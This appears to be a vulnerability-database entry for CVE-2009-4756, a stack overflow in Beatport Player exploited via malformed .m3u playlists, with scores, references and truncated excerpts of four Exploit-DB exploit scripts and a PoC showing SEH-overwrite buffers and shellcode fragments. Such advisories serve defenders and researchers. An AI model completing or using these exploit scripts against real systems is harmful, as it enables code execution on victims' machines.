CVE-2009-4756
Published 2010-03-29
CVE-2009-4756: Stack-based buffer overflow in TraktorBeatport.exe 1.0.0.283 in Beatport Player 1.0.0.0 allows remote attackers to execute arbitrary code via a long string in…
Priority P343 · critical · 9.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 6.91% (93.3th percentile)
Stack-based buffer overflow in TraktorBeatport.exe 1.0.0.283 in Beatport Player 1.0.0.0 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| beatport | beatport_player | — | — |
No detection rules found.
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)
exploitdb·2009-05-01
---
#usage: exploit.py
# Grab the exploit file into the program
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8588\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
buff = "\x41" * 1232
next_seh = "\xEB\x06\x90\x90"
seh = "\xB8\x15\xD1\x72" #msacm32.drv
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)
exploitdb·2009-05-01
---
#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)
exploitdb·2009-05-01
---
#exploit.py
#
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Tested on : Windows xp sp2
#
chars = "\x41" * 1232
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72"
nops = "\x90" * 20
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2009-05-01
---
#####################################################################################################
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
# Discovered by SirGod - www.mortal-team.net
# Error log :
#
# Logged at Friday, May 01, 2009 14:03:17
# FileVersion: 1.0.0.283
# ProductVersion: 1.0.0.0
# Exception Code: 0xC0000005
# Exception Addr: 0x001B:0x004317F0
# Exception Module: TraktorBeatport.exe
# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
# The memory could not be "read"
# http://www.brothersoft.com/beatport-player-download-62319.html
######################################################################################################
my $chars=
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/8588
http://www.exploit-db.com/exploits/8590
http://www.exploit-db.com/exploits/8591
http://www.exploit-db.com/exploits/8592
http://www.securityfocus.com/bid/34793
https://exchange.xforce.ibmcloud.com/vulnerabilities/50267
Published: 2010-03-29